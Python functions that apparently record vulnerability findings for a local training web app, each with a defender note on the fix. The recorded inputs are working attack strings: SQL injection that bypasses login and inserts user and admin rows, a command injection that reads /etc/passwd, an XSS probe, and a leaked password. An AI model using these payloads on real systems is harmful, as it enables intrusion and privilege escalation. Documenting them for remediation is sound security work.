Exemple #1
def adminlogin_page_access():
    """Return the printed flaw record for the login-page information leak.

    Builds an ``fl`` record for the local training target's login URL and
    attaches two ``fs`` entries, one for the page's JavaScript and one for
    the password field. ``fl`` and ``fs`` are defined elsewhere; their
    arguments look like (category, URL, summary) and (field, note, value)
    -- TODO confirm against their definitions.

    Defender note: the record says the page relies on obfuscated
    client-side script and a hidden clickable element. Obfuscation is not
    an access control; the check belongs on the server.
    """
    leak = fl(
        'Information leakage',
        'http://localhost:8081/secu/login.secu',
        'Leakage in login',
    )
    entries = (
        fs('javascript', 'obfuscated', 'click invisible point after last word'),
        # NOTE(review): '#muse1' looks like the disclosed credential -- confirm.
        fs('password', 'cheat for password or use sql inject', '#muse1'),
    )
    for entry in entries:
        leak.fields.append(entry)
    return leak.printFlaw()
Exemple #2
def login_page_insertuser():
    """Return the printed flaw record for a stacked-statement SQL injection.

    The record targets the login URL of the local training application and
    carries one ``fs`` entry per form field. ``fl``/``fs`` come from
    elsewhere in the project; argument meaning is inferred from usage.

    Defender note: the recorded password value chains a second statement
    onto the login query. If the finding is accurate, the query is built by
    string concatenation and the driver accepts multiple statements. The
    fix is a parameterized query, with multi-statement execution disabled.
    The inserted row also carries 'pwd5' in ``mpwd``, which suggests user
    passwords are stored unhashed -- confirm against the schema.
    """
    target_url = 'http://localhost:8081/secu/login.secu'
    # Kept byte-for-byte: this string is the documented test input.
    recorded_password = "t' or '1' = '1'; insert into M_USER (ID,muname,mpwd) values (6,'chris','pwd5');select count(*) from M_USER where muname='alan' and mpwd='pwd1"

    record = fl('SQLinject', target_url, 'SQL inject in login')
    user_entry = fs('username', 'Not validated - look forum', 'alan')
    password_entry = fs('password', "Not validated", recorded_password)
    record.fields.append(user_entry)
    record.fields.append(password_entry)
    return record.printFlaw()
Exemple #3
def login_page_insertadmin():
    """Return the printed flaw record for the admin-table SQL injection.

    Builds an ``fl`` record for the login URL with a username entry and a
    password entry, then returns ``printFlaw()``. ``fl``/``fs`` are defined
    outside this block.

    NOTE(review): the category passed to ``fl`` is 'Information leakage',
    but the summary ('sqlinject admin') and the password note ('sql
    inject') both describe SQL injection -- confirm which one is intended.

    Defender note: the recorded value writes a row into ``M_ADMIN`` through
    the login form. That means the application's database account can
    INSERT into the admin table. Besides parameterizing the query, the
    login path should run with a least-privilege DB role. The 64-hex-digit
    ``mpwd`` value is presumably a SHA-256 digest -- confirm.
    """
    # Kept byte-for-byte: this string is the documented test input.
    recorded_password = "t' or '1' = '1'; insert into M_ADMIN (ID,mpwd) values (2,'d3751d33f9cd5049c4af2b462735457e4d3baf130bcbb87f389e349fbaeb20b9');select count(*) from M_USER where muname='chris' and mpwd='pwd5"

    record = fl(
        'Information leakage',
        'http://localhost:8081/secu/login.secu',
        'sqlinject admin',
    )
    entries = (
        fs('username', 'not validated', 'alan'),
        fs('password', 'sql inject', recorded_password),
    )
    for entry in entries:
        record.fields.append(entry)
    return record.printFlaw()
Exemple #4
def login_page():
    """Return the printed flaw record for the login-form SQL injection.

    Creates an ``fl`` record for the login URL of the local training
    application, appends one ``fs`` entry for the username and one for the
    password, and returns ``printFlaw()``. ``fl``/``fs`` are project names
    defined elsewhere.

    Defender note: the recorded password value is a tautology-style input.
    If it authenticates, the credential check is assembled from raw input.
    Use a parameterized query and compare a salted password hash in
    application code.
    """
    login_url = 'http://localhost:8081/secu/login.secu'
    record = fl('SQLinject', login_url, 'SQL inject in login')

    name_entry = fs('username', 'Not validated - look forum', 'alan')
    secret_entry = fs('password', "Not validated", "test' or '1' = '1")
    record.fields.append(name_entry)
    record.fields.append(secret_entry)

    return record.printFlaw()
Exemple #5
def login_page():
    """Build and print-format the SQL injection finding for the login form.

    One ``fl`` record is created for the login URL and two ``fs`` entries
    (username, password) are appended to ``fields`` in that order. The
    result of ``printFlaw()`` is returned. ``fl`` and ``fs`` are not defined
    in this block.

    Defender note: the password sample is a boolean tautology. A login that
    accepts it is concatenating input into its WHERE clause; bind
    parameters remove the problem.
    """
    finding = fl(
        'SQLinject',
        'http://localhost:8081/secu/login.secu',
        'SQL inject in login',
    )
    for entry in (
        fs('username', 'Not validated - look forum', 'alan'),
        fs('password', "Not validated", "test' or '1' = '1"),
    ):
        finding.fields.append(entry)
    return finding.printFlaw()
Exemple #6
def adminlogin_page_access():
    """Build and print-format the information-leak finding for the login page.

    Creates the ``fl`` record, appends a 'javascript' entry and a
    'password' entry to ``fields``, and returns ``printFlaw()``. ``fl`` and
    ``fs`` are defined elsewhere, so the meaning of each positional
    argument is inferred from usage.

    Defender note: the finding describes access that depends on something
    hidden in the page. Anything shipped to the browser is readable by the
    user, so the secret and the check must live server-side.
    """
    page = 'http://localhost:8081/secu/login.secu'
    finding = fl('Information leakage', page, 'Leakage in login')

    script_entry = fs(
        'javascript',
        'obfuscated',
        'click invisible point after last word',
    )
    # NOTE(review): third argument is presumably the exposed password.
    password_entry = fs(
        'password',
        'cheat for password or use sql inject',
        '#muse1',
    )

    finding.fields.append(script_entry)
    finding.fields.append(password_entry)
    return finding.printFlaw()
Exemple #7
def login_page_insertuser():
    """Build and print-format the stacked-query SQL injection finding.

    An ``fl`` record for the login URL receives a username entry and a
    password entry, in that order, and ``printFlaw()`` is returned.
    ``fl``/``fs`` are project names not visible here.

    Defender note: the recorded input appends an INSERT into ``M_USER``
    after the login condition. Remediation is bind parameters plus a
    driver or connection setting that rejects multiple statements per call.
    A detection rule can also flag ';' followed by a DML keyword in
    login-form parameters.
    """
    finding = fl(
        'SQLinject',
        'http://localhost:8081/secu/login.secu',
        'SQL inject in login',
    )
    entries = (
        fs('username', 'Not validated - look forum', 'alan'),
        # Runtime string reproduced exactly as recorded.
        fs(
            'password',
            "Not validated",
            "t' or '1' = '1'; insert into M_USER (ID,muname,mpwd) values (6,'chris','pwd5');select count(*) from M_USER where muname='alan' and mpwd='pwd1",
        ),
    )
    for entry in entries:
        finding.fields.append(entry)
    return finding.printFlaw()
Exemple #8
def login_page_insertadmin():
    """Build and print-format the finding for SQL injection into M_ADMIN.

    Creates the ``fl`` record, appends username and password ``fs``
    entries, and returns ``printFlaw()``. ``fl``/``fs`` are defined
    elsewhere.

    NOTE(review): the record is categorised as 'Information leakage' while
    its summary and field note say SQL injection -- verify the category.

    Defender note: a login query that can write to the admin table points
    to an over-privileged database account as well as to unparameterized
    SQL. Both need fixing.
    """
    login_url = 'http://localhost:8081/secu/login.secu'
    # Runtime string reproduced exactly as recorded.
    recorded_password = "t' or '1' = '1'; insert into M_ADMIN (ID,mpwd) values (2,'d3751d33f9cd5049c4af2b462735457e4d3baf130bcbb87f389e349fbaeb20b9');select count(*) from M_USER where muname='chris' and mpwd='pwd5"

    finding = fl('Information leakage', login_url, 'sqlinject admin')
    user_entry = fs('username', 'not validated', 'alan')
    password_entry = fs('password', 'sql inject', recorded_password)
    finding.fields.append(user_entry)
    finding.fields.append(password_entry)
    return finding.printFlaw()
Exemple #9
def fielmanager():
    """Return the printed flaw record for the admin picture page's ``path`` parameter.

    Builds an ``fl`` record categorised as 'command inject' with a single
    ``fs`` entry holding the recorded URI, then returns ``printFlaw()``.
    ``fl``/``fs`` are defined elsewhere in the project.

    Defender note: the recorded URI places a shell separator inside
    ``path``. If the finding is accurate, the value reaches a shell command
    unquoted. The handler should use file APIs rather than a shell and
    resolve the path against an allowlisted base directory.
    """
    page = 'http://localhost:8081/secu/admininternpic.secu'
    recorded_uri = 'http://localhost:8081/secu/admininternpic.secu?path=/etc/passwd;cat%20/etc/passwd'

    record = fl('command inject', page, 'Command injection')
    uri_entry = fs('uri', 'Not validated', recorded_uri)
    record.fields.append(uri_entry)
    return record.printFlaw()
Exemple #10
def image_library():
    """Print the flaw record for the picture gallery's ``pic`` parameter.

    Builds an ``fl`` record categorised as 'XSS' with one ``fs`` entry for
    the URI and prints ``printFlaw()``. Nothing is returned.
    ``fl``/``fs`` are defined elsewhere.

    NOTE(review): the sibling builders return the formatted record instead
    of printing it -- confirm whether callers expect a return value here.

    Defender note: the recorded value is an ordinary image URL; the record
    only states that ``pic`` is not validated. A parameter that accepts a
    full URL should be restricted to known image paths, and its value
    should be attribute-encoded wherever it is written into the page.
    """
    gallery = 'http://localhost:8081/secu/picturegallery.secu'
    sample_uri = 'http://localhost:8081/secu/picturegallery.secu?pic=http://localhost:8081/secu/img/logo.png'

    record = fl('XSS', gallery, 'Possible XSS in URI')
    record.fields.append(fs('URI', 'Not validated', sample_uri))
    # Single parenthesised argument: same output under the Python 2 print
    # statement this function was written with.
    print(record.printFlaw())
Exemple #11
def search_page():
    """Return the printed flaw record for the search field's reflected markup.

    Builds an ``fl`` record categorised as 'XSS' for the search URL,
    appends one ``fs`` entry for 'searchfield', and returns
    ``printFlaw()``. ``fl``/``fs`` are defined elsewhere.

    Defender note: the recorded value is a harmless bold-tag marker
    preceded by a comment terminator. If it renders as bold text, the
    search term is echoed without HTML encoding. Context-aware output
    encoding is the fix; a Content-Security-Policy adds defence in depth.
    """
    search_url = 'http://localhost:8081/secu/search.secu'
    record = fl('XSS', search_url, 'Possible XSS in search field')
    marker_entry = fs('searchfield', 'Not validated', '--><b>problem</b>')
    record.fields.append(marker_entry)
    return record.printFlaw()